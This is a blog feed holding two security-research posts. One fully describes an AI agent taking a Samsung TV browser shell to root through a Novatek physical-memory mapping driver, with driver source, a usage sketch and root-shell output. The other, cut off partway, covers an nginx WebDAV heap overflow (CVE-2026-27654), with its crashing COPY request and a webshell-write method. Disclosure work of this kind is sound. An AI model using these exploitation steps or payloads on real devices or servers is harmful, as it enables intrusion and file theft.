https://substackcdn.com/image/fetch/$s_!3p6C!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3p6C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg" width="4032" height="3024" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:3024,&quot;width&quot;:4032,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The subject&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The subject" title="The subject" srcset="https://substackcdn.com/image/fetch/$s_!3p6C!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 424w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 848w, https://substackcdn.com/image/fetch/$s_!3p6C!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1272w, 
https://substackcdn.com/image/fetch/$s_!3p6C!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9f73e98b-8a92-499b-9590-66d5997c387b_4032x3024.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture></div></a></figure></div><p>Note that the target TV is an older model running an outdated version of Chrome and an outdated kernel.</p><h2>Table of Contents</h2><ul><li><p><a href="https://blog.calif.io/i/194088814/the-harness">The Harness</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-goal">The Goal</a></p></li><li><p><a 
href="https://blog.calif.io/i/194088814/the-facts">The Facts</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-vulnerability">The Vulnerability</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-constraint">The Constraint</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-primitive">The Primitive</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-root-cause">The Root Cause</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-chain">The Chain</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-exploit">The Exploit</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-final-run">The Final Run</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/the-bromance">The Bromance</a></p></li><li><p><a href="https://blog.calif.io/i/194088814/conclusion">Conclusion</a></p></li></ul><h2>The Harness</h2><p>We didn't provide a bug or an exploit recipe. We provided an environment Codex could actually operate in, and the easiest way to understand it is to look at the pieces separately.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!JU0D!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!JU0D!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 424w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 848w, 
https://substackcdn.com/image/fetch/$s_!JU0D!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1272w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!JU0D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png" width="980" height="620" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:620,&quot;width&quot;:980,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The harness&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The harness" title="The harness" srcset="https://substackcdn.com/image/fetch/$s_!JU0D!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 424w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 848w, 
https://substackcdn.com/image/fetch/$s_!JU0D!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1272w, https://substackcdn.com/image/fetch/$s_!JU0D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb97d327d-d5d0-40b8-abb5-9a756f71c61e_980x620.png 1456w" sizes="100vw" loading="lazy"></picture></div></a></figure></div><p><code>KantS2</code> is Samsung's internal platform name for the Smart TV firmware used on this device model.</p><p>The setup looked like 
this:</p><ul><li><p><strong>[1] Browser foothold:</strong> we already had code execution inside the browser application's own security context on the TV, which meant the task was not "get code execution somehow" but "turn browser-app code execution into root."</p></li><li><p><strong>[2] Controller host:</strong> we had a separate machine that could build ARM binaries, host files over HTTP, and reach the shell session that was actually alive on the TV.</p></li><li><p><strong>[3] Shell listener:</strong> the target shell was driven through <code>tmux send-keys</code>, which meant Codex had to inject commands into an already-running shell and then recover the results from logs instead of treating the TV like a fresh interactive terminal.</p></li><li><p><strong>[4] Matching source release:</strong> we had the <code>KantS2</code> source tree for the corresponding firmware family, which let Codex audit Samsung's own kernel-driver code and then test those findings against the live device.</p></li><li><p><strong>[5] Execution constraints:</strong> the target required static ARMv7 binaries, and unsigned programs could not simply run from disk because of Samsung Tizen's Unauthorized Execution Prevention, or UEP.</p></li><li><p><strong>[6] <code>memfd</code> wrapper:</strong> to work around UEP, we already had a helper that loaded a program into an anonymous in-memory file descriptor and executed it from memory instead of from a normal file path.</p></li></ul><p>With that setup, Codex's loop was simple: inspect the source and session logs, send commands into the TV through the controller and the <code>tmux</code>-driven shell, read the results back from logs, and, when a helper was needed, build it on the controller, have the TV fetch it, and run it through <code>memfd</code>. A few short prompts made that operating loop explicit:</p><div class="callout-block" data-callout="true"><p>SSH to &lt;user&gt;@&lt;controller-host&gt;. 
This is the shell listener.</p><p>tmux session 0 ... use tmux send-keys ...</p><p>Build it statically ... armv7l.</p><p>Samsung blocks running unsigned binaries; run it via memfd wrapper.</p><p>Use ... wget ... use the IP of the server.</p></div><h2>The Goal</h2><p>The opening prompt was intentionally broad:</p><div class="callout-block" data-callout="true"><p>The goal ... is to find a vulnerability in this TV to escalate privilege to root.</p><p>It is either by device driver or publicly known vulnerabilities ...</p></div><p>We set the destination and left the route open. We did not point Codex at a driver, suggest physical memory, or mention kernel credentials, so it had to treat the session as a real privilege-escalation hunt rather than a confirmation exercise.</p><p>The second prompt narrowed the standard:</p><div class="callout-block" data-callout="true"><p>... cross check the source to all vulnerabilities from that day onwards ...</p><p>Make sure to THOROUGHLY check if a vulnerability actually still exists ...</p><p>reachability (must be reachable as the browser user context).</p><p>Make sure to check for the actual availability of the attack surface in the live system ...</p></div><p>We raised the bar: the bug had to exist in the source, be present on the device, and be reachable from the browser shell. Codex's output quickly narrowed into concrete candidates.</p><h2>The Facts</h2><p>We then gave Codex the facts that would anchor the rest of the session:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">uid=5001(owner) gid=100(users)
Linux Samsung 4.1.10 ...
/dev/... /proc/modules ... /p&#8203;roc/cmdline ...</code></pre></div><p>That bundle did most of the framing work. The browser identity defined the privilege boundary and later became part of the signature Codex used to recognize the browser process's kernel credentials in memory. The kernel version narrowed the codebase, the device nodes defined the reachable interfaces, and <code>/p&#8203;roc/cmdline</code> later supplied the memory-layout hints for physical scanning.</p><h2>The Vulnerability</h2><p>Codex quickly zeroed in on a set of world-writable <code>ntk*</code> device nodes exposed to the browser shell:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">crw-rw-rw-  1 root root 210,0  ntkhdma
crw-rw-rw-  1 root root 251,0  ntksys
crw-rw-rw-  1 root root 217,0  ntkxdma</code></pre></div><p>Codex focused on that driver family because it was loaded on the device, reachable from the browser shell, and present in the released source tree. Reading the matching <code>ntkdriver</code> sources is also where the Novatek link became clear: the tree is stamped throughout with Novatek Microelectronics identifiers, so these <code>ntk*</code> interfaces were not just opaque device names on the TV, but part of the Novatek stack Samsung had shipped. That gave the session a concrete direction.</p><h2>The Constraint</h2><p>At one point we had to give Codex a constraint that could easily have derailed the session:</p><div class="callout-block" data-callout="true"><p>iomem is denied access bro</p></div><p><code>/proc/iomem</code> is one of the normal places to reason about physical memory layout, so losing it mattered. Codex responded by pivoting to another source of truth - <code>/p&#8203;roc/cmdline</code>:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">mem=400M@32M mem=256M@512M mem=192M@2048M</code></pre></div><p>Those boot parameters were enough to reconstruct the main RAM windows for the later scan.</p><h2>The Primitive</h2><p>With the field narrowed to <code>ntksys</code> and <code>ntkhdma</code>, Codex audited the matching <code>KantS2</code> source and found the primitive that made the rest of the session possible.</p><p><code>/dev/ntksys</code> was a Samsung kernel-driver interface that accepted a physical address and a size from user space, stored those values in a table, and then mapped that physical memory back into the caller's address space through <code>mmap</code>. That is what we mean here by a <code>physmap</code> primitive: a path that gives user space access to raw physical memory. 
The operational consequence was straightforward. If the browser shell could use <code>ntksys</code> this way, Codex would not need a kernel code-execution trick. It would only need a reliable kernel data structure to overwrite.</p><p>From there, the path was no longer a kernel control-flow exploit, but a data-only escalation built on physical-memory access.</p><h2>The Root Cause</h2><h3>1. <code>ntksys</code> is intentionally exposed to unprivileged callers</h3><p>The shipping udev rule grants world-writable access to <code>/dev/ntksys</code>:</p><p>Source: <code>sources/20_DTV_KantS2/tztv-media-kants/99-tztv-media-kants.rules</code></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;text&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-text">KERNEL=="ntksys", MODE="0666", SECLABEL{smack}="*"</code></pre></div><p>This is already a serious design error because <code>ntksys</code> is not a benign metadata interface. It is a memory-management interface.</p><h3>2. User space controls the physical base and size</h3><p>The driver interface is built around <code>ST_SYS_MEM_INFO</code>:</p><p>Source: <code>ker_sys.h</code></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">typedef struct _ST_SYS_MEM_INFO
{
    EN_SYS_MEM_TYPE enMemType;
    u32             u32Index;
    u32             u32Start;
    u32             u32Size;
} ST_SYS_MEM_INFO;

#define KER_SYS_IOC_SET_MEM_INFO _IOWR(VA_KER_SYS_IOC_ID, 1, ST_SYS_MEM_INFO)</code></pre></div><p><code>u32Start</code> and <code>u32Size</code> come directly from user space. Those are the only two values an attacker needs to turn this interface into a raw physmap.</p><h3>3. <code>SET_MEM_INFO</code> validates the slot, not the physical range</h3><p>The critical write path is in <code>ker_sys.c</code> around line 1158:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">u32Idx = stMemInfo.u32Index;
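/*
 * From user space, reaching this handler takes three calls. A sketch, with
 * the device path from the udev rule and the struct and ioctl request from
 * ker_sys.h above (the target address and size here are illustrative):
 *
 *   int fd = open("/dev/ntksys", O_RDWR);
 *   ST_SYS_MEM_INFO mi = { .u32Index = 0, .u32Start = target_phys, .u32Size = 0x1000 };
 *   ioctl(fd, KER_SYS_IOC_SET_MEM_INFO, &amp;mi);  // store the range in slot 0
 *   void *p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
 *                                 // mmap offset 0 selects vm_pgoff 0, i.e. slot 0
 *
 * Only the table index is validated below; u32Start and u32Size are stored as-is:
 */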
if( u32Idx &gt;= MAX_UIO_MAPS )
    lError = -EFAULT;
else {
    g_astMemInfo[u32Idx].enMemType = stMemInfo.enMemType;
    g_astMemInfo[u32Idx].u32Index  = u32Idx;
    g_astMemInfo[u32Idx].u32Start  = stMemInfo.u32Start;
    g_astMemInfo[u32Idx].u32Size   = stMemInfo.u32Size;
    lError = ENOERR;
}</code></pre></div><p>The driver checks whether the table index is valid. It does not check whether the requested physical range belongs to a kernel-owned buffer, whether it overlaps RAM, whether it crosses privileged regions, or whether the caller should be allowed to map it at all.</p><h3>4. <code>mmap</code> remaps the chosen PFN verbatim</h3><p>The corresponding map path is in <code>ker_sys.c</code> around line 1539:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">m = vma-&gt;vm_pgoff;
if( m &gt;= MAX_UIO_MAPS ) return -EINVAL;
if( g_astMemInfo[m].enMemType == EN_SYS_MEM_TYPE_MAX ) return -EINVAL;
...
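/* g_astMemInfo[m].u32Start is whatever an unprivileged SET_MEM_INFO call
 * stored in the slot, so the page frame number below is attacker-chosen: */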
iRetVal = vk_remap_pfn_range( vma, vma-&gt;vm_start,
                              g_astMemInfo[m].u32Start &gt;&gt; PAGE_SHIFT,
                              vma-&gt;vm_end - vma-&gt;vm_start,
                              vma-&gt;vm_page_prot );</code></pre></div><p><code>vma-&gt;vm_pgoff</code> selects the slot, and the slot contents are attacker-controlled. The driver then passes the user-chosen PFN directly to <code>vk_remap_pfn_range</code>. At that point the kernel is no longer enforcing privilege separation for physical memory.</p><h3>5. <code>ntkhdma</code> makes validation easier by leaking a physical address</h3><p><code>/dev/ntkhdma</code> provides a helpful supporting primitive:</p><p>Source: <code>ker_hdma.c</code></p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;c&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-c">case KER_HDMA_IO_GET_BUFF_ADDR: {
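    /* gu32HDMAMemPhysAddr holds the physical address of the driver's DMA
     * buffer; it is copied out to any process that can open /dev/ntkhdma: */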
    if( vk_copy_to_user( ( void __user * )u32Arg, &amp;gu32HDMAMemPhysAddr, sizeof( u32 ) ) ) {
        iError = -EFAULT;
        break;
    }
    break;
}</code></pre></div><p>This is not the core privilege-escalation bug, but it is useful operationally. It hands unprivileged code a known-good physical address that can be mapped through <code>ntksys</code> to prove the primitive works before touching arbitrary RAM.</p><h2>The Chain</h2><p>Codex did not jump directly from source audit to final exploitation. It built a proof chain in stages.</p><p>First it wrote a small helper to talk to <code>/dev/ntkhdma</code> and ask for the physical address of the device's DMA (direct memory access) buffer. A DMA buffer is memory the driver uses for direct hardware access, and the key point here was not DMA itself but the fact that the driver was willing to hand an unprivileged process a real physical address. The first preserved success looked like this:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">python3 rmem.py ntkhdma_leak
HDMA buffer phys addr: 0x84840000</code></pre></div><p>That gave Codex a safe, known-good physical page to test against. It then wrote a second helper to answer the more dangerous question: if it registered that physical address through <code>ntksys</code>, could it really map the page into user space and read or write it from the browser shell? The answer was yes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">HDMA buffer phys addr: 0x84840000
HDMA buffer[0] = 0x00000010
read32: 00000010 fd02005c 00000000 fc0d0430
writing 0x41414141 to mapped address...
readback: 0x41414141</code></pre></div><p>Before that output, the issue was still a source-backed theory; after it, Codex had shown that an unprivileged process on the TV could read and write a chosen physical page. The remaining question was which kernel object to corrupt.</p><h2>The Exploit</h2><p>The exploit did not come from us. We never told Codex to patch <code>cred</code>, never explained what <code>cred</code> was, and never pointed out that the browser process's <code>uid=5001</code> and <code>gid=100</code> would make a recognizable pattern in memory.</p><p>That choice followed directly from the primitive it had already proven.</p><p>For anyone who does not spend time in Linux internals, <code>cred</code> is the kernel structure that stores a process's identities: user ID, group ID, and related credential fields. If you can overwrite the right <code>cred</code>, you can change who the kernel thinks the process is. Once Codex had arbitrary physical-memory access, the remaining plan became straightforward: scan the RAM windows recovered from <code>/p&#8203;roc/cmdline</code>, look for the browser process's credential pattern, zero the identity fields, and then launch a shell.</p><p>The live shell had given Codex the identity values, the source audit had given it the primitive, the early helpers had proven that primitive, and the final exploit connected those pieces without needing any elaborate kernel control-flow trick.</p><h2>The Final Run</h2><p>By the time we reached the final run, the hard parts were already in place. We had the surface, the primitive, the deployment path, and the exploit. The last human prompt was:</p><div class="callout-block" data-callout="true"><p>yeah okay try to check if it works</p></div><p>Codex pushed the final chain through the controller path, had the TV fetch it, ran it through the in-memory wrapper, and waited for the result. 
The output was:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;shell&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-shell">[*] scanning range 0x02000000 - 0x1b000000
[*] map chunk phys=0x07400000 size=0x00100000
[+] cred match at phys 0x07498080 -&gt; patching
[+] cred match at phys 0x07498580 -&gt; patching
...
[+] patched creds, launching /bin/sh
id
uid=0(root) gid=0(root) groups=29(audio),44(video),100(users),201(display),1901(log),6509(app_logging),10001(priv_externalstorage),10502(priv_mediastorage),10503(priv_recorder),10704(priv_internet),10705(priv_network_get) context="User::Pkg::org.tizen.browser"</code></pre></div><p>Codex's first preserved acknowledgment was:</p><div class="callout-block" data-callout="true"><p>Worked.</p></div><p>By that point, the chain had already gone through surface selection, source audit, live validation, PoC development, target-specific build handling, remote deployment, execution under <code>memfd</code>, iterative debugging, and finally the credential overwrite that turned the browser shell into root.</p><h2>The Bromance</h2><p>While we were driving Codex toward the final destination, it repeatedly threatened to go off-track, and we had to steer it back immediately. Here are some of those real interactions:</p><div class="callout-block" data-callout="true"><p>bro, when you overwrite the args count, wouldn&#8217;t the loop just go wild?</p><p>bro can you just like, send it to the server, build it, and use the tmux shell to pull it down and run it for me? Why *** do you tell me to do *** bro, that&#8217;s your job</p><p>bro. the &lt;IP address&gt; is not the TV, it is where the shell lives</p><p>bro. what *** you did man? the tv froze</p><p>Bro what did you do before you just replicate it now? why so hard?</p></div><p>Honestly, this made it even more realistic than we expected. At times it was a one-shot success; at other times we really had to build a genuine working relationship with Codex. This couldn't have been completed if we had treated it like a soulless bug-finding and exploit-developing machine!</p><h2>Conclusion</h2><p>What made the session worth documenting was the shape of the loop itself. 
We set up a control path into a compromised TV, gave Codex the matching source tree and a way to build and stage code, and from there the work became a repeated cycle of inspection, testing, adjustment, and rerun until the browser foothold turned into root on the device.</p><p>This experiment is part of a larger exercise. The browser shell wasn't magically obtained by Codex. We had already exploited the device to get that initial foothold. The goal here was narrower: given a realistic post-exploitation position, could AI take it all the way to root?</p><p>The next step is obvious (and slightly concerning): let the AI do the whole thing end-to-end. Hopefully it'll stay trapped inside the TV forever, quietly escalating privileges and watching our sitcoms.</p><p><a href="https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/writeup.md">Writeup</a> and <a href="https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/README.md#artifacts">PoCs</a>: <a href="https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/README.md">https://github.com/califio/publications/blob/main/MADBugs/samsung-tv/</a>.</p><p>&#8212;dp</p><div><hr></div><p><em>The MAD Bugs series runs through April 2026. 
Full index at <a href="https://blog.calif.io/t/madbugs">blog.calif.io/t/madbugs</a> and <a href="https://github.com/califio/publications/tree/main/MADBugs">github.com/califio/publications</a>.</em></p>]]></content:encoded></item><item><title><![CDATA[Claude + Humans vs nginx: CVE-2026-27654]]></title><description><![CDATA[What humans still do when Claude already found the bug.]]></description><link>https://blog.calif.io/p/claude-humans-vs-nginx-cve-2026-27654</link><guid isPermaLink="false">https://blog.calif.io/p/claude-humans-vs-nginx-cve-2026-27654</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Fri, 10 Apr 2026 21:20:31 GMT</pubDate><content:encoded><![CDATA[<blockquote><p>We'd like to acknowledge Anthropic, NGINX developers and F5 PSIRT for partnering with us on this. It was a pleasant experience.</p></blockquote><p>By now we know AI can find <a href="https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude">real</a> <a href="https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero">vulnerabilities</a> and write <a href="https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd">working</a> <a href="https://blog.calif.io/p/mad-bugs-feeding-claude-phrack-articles">exploits</a>. That part is no longer surprising.</p><p>The more interesting question is the human role. Where does human expertise still matter when the initial bug report is already correct? What separates a crash from a real exploit? What does collaboration look like in practice, on a real vulnerability with a real fix and a real disclosure?</p><p>CVE-2026-27654 is a useful case. The bug needs a non-default config: <code>ngx_http_dav_module</code> compiled in, and a <code>location</code> combining <code>alias</code> with <code>dav_methods COPY</code> or <code>MOVE</code>. The exposed population is small. 
Inside that population the bug is severe.</p><p>Claude flagged it correctly: a heap buffer overflow in <code>ngx_http_dav_copy_move_handler()</code>, driven by an unsigned underflow in <code>ngx_http_map_uri_to_path()</code> when the <code>Destination</code> header is shorter than the location prefix. Claude provided a working crash:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;http&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-http">COPY /dav/x HTTP/1.1
Host: localhost
Destination: /da      &lt;-- shorter than "/dav/" -&gt; underflow</code></pre></div><p>That crashes a worker. Whether it can do more than that is a harder question, and at least for now, answering it takes a human.</p><p>What it does, when it works: it escapes the WebDAV root. The <code>alias</code> directive is supposed to be a jail; a COPY against <code>location /dav/ { alias /var/dav/uploads/; }</code> should only ever touch files under <code>/var/dav/uploads/</code>. The bug lets a remote attacker read or write files anywhere the worker UID can reach.</p><p>Three of us worked through this with Claude independently, each in our own session, comparing notes between rounds. The independence mattered: the same prompt to two different Claude conversations produced one "impossible" and one working exploit (more on that under Round two). The first exploit out of the gate was a clean repro we could ship to F5; the refinements that followed came from looking at what each of us had built and asking which precondition felt least likely to exist on a real target.</p><p><strong>Round one: aim high</strong> (<a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">PoC-1</a>). Arbitrary file write with attacker-chosen content. PUT a webshell under the WebDAV root, then trigger the overflow on COPY to copy it to <code>/var/www/html/x.php</code>. Claude built it; it worked. But the heap groom needs the source-path buffer pushed into a separate <code>malloc()</code> block, which means a request URI over 4000 characters, which means the PUT must land in a directory tree twenty levels deep with ~200-character folder names. 
nginx builds that tree if you set <code>create_full_put_path on</code>, but "the server accepts arbitrarily long PUT paths" is not a precondition you find often.</p><p><strong>Round two: give up on write</strong> (<a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">PoC-2</a>). The question we put to Claude:</p><blockquote><p><em>We don't actually need to write our own bytes. If we control both the source and the destination of the COPY, can we copy a file that already exists, like <code>/etc/passwd</code>, into a download folder we can fetch it from?</em></p></blockquote><p>Two of us asked independently. One Claude said it was impossible. The other produced a working exploit first try: a single COPY, short URI so the source path stays in the request pool adjacent to the destination, and the same overflow rewrites <em>both</em> paths at once. That became PoC-2.</p><p>The first thing we tested after it worked was whether it was as clean as it looked. The draft of this writeup said the worker "never crashes."</p><blockquote><p><em>This is not true, right? Because the second PoC did crash workers if memcpy didn't hit that lucky condition.</em></p></blockquote><p>It hadn't checked. We made it sweep all 16 alignment residues; two of them crash before any file is touched. The "never" became "on 14 of 16 alignments."</p><p>Then the constraint. The traversal injected into the source path is 20 characters, fixed by the header structure. Claude's first count of how those 20 split was wrong:</p><blockquote><p><em>With a 3-level surviving prefix you spend 12 characters on <code>/../../../</code> and have 8 left for the filename. Is this a correct assessment?</em></p></blockquote><p>It wasn't. <code>/../../../</code> is 10, not 12; <code>etc/passwd</code> is 10, not 8. (Note to self: never ask Claude to file our tax returns.) Ten and ten, and <code>etc/passwd</code> fits exactly. 
We asked whether the constraint itself could be stretched and the answer was: not by changing the URI length (both endpoints of the controlled window shift together), but yes by tuning the <em>header-key</em> lengths, which we ended up doing in &#167;6.3.</p><p><strong>Round three happened while we were writing this document</strong> (<a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">slash-padding variant</a>). We were fact-checking why the deep PUT tree in PoC-1 is unavoidable, and the chain went like this:</p><blockquote><p><em>Can you do something like this to artificially expand the length? <code>COPY /etc/../etc/../etc/../etc/../passwd HTTP/1.1</code></em></p></blockquote><p>No. nginx normalizes <code>..</code> before <code>r-&gt;uri.len</code> is set; the padding gets stripped.</p><blockquote><p><em>Does it also normalize the source path in <code>COPY &lt;source_path&gt;</code>? We want a long source-path string to push it into its own malloc, but at the same time we want it to resolve to a short path on the filesystem. Is that possible?</em></p></blockquote><p>That was the question that mattered. Claude tested <code>/.</code>, <code>//</code>, <code>%2e%2e</code>: all collapsed. Then it tried <code>merge_slashes off</code>. With that one directive, nginx stops collapsing <code>//</code> but the kernel still does (POSIX path resolution). So <code>/dav/</code> + 4000 slashes + <code>p.php</code> is a 4010-character URI to nginx and the same inode as <code>/dav/p.php</code> to <code>lstat()</code>. Worked first try. The deep tree, <code>create_full_put_path</code>, the long folder names: all gone, traded for one line of config that exists in the wild for unrelated reasons.</p><p>So three variants, each one found by asking what's actually load-bearing in the previous one's preconditions. 
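<p>(The kernel-side half of that last trade is easy to verify outside nginx: POSIX path resolution collapses repeated slashes no matter what the server does. A standalone sketch using temp files:)</p>

```python
import os
import tempfile

# A path that is ~4000 bytes longer as a string still resolves to the
# same inode, because the kernel collapses the repeated slashes.
d = tempfile.mkdtemp()
short = os.path.join(d, "p.php")
with open(short, "w") as f:
    f.write("x")

padded = d + "/" * 4000 + "p.php"   # long to nginx, short to lstat()
assert os.path.samefile(short, padded)
```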
